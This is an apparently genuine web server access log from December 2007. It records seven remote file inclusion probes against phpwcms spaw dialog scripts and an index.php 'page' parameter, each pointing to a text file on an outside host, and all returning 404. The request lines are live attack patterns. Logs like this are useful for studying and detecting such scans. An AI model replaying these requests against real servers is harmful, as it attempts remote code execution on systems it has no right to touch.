82.194.71.230 - - [23/Dec/2007:22:32:02 -0800] "GET /logs/index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
218.38.58.151 - - [23/Dec/2007:22:32:15 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/send_reminders.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.58.151 - - [23/Dec/2007:22:32:15 -0800] "GET /logs/access_071215.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.58.151 - - [23/Dec/2007:22:32:16 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.58.151 - - [23/Dec/2007:22:32:16 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.58.151 - - [23/Dec/2007:22:32:17 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/send_reminders.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.58.151 - - [23/Dec/2007:22:32:18 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/send_reminders.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
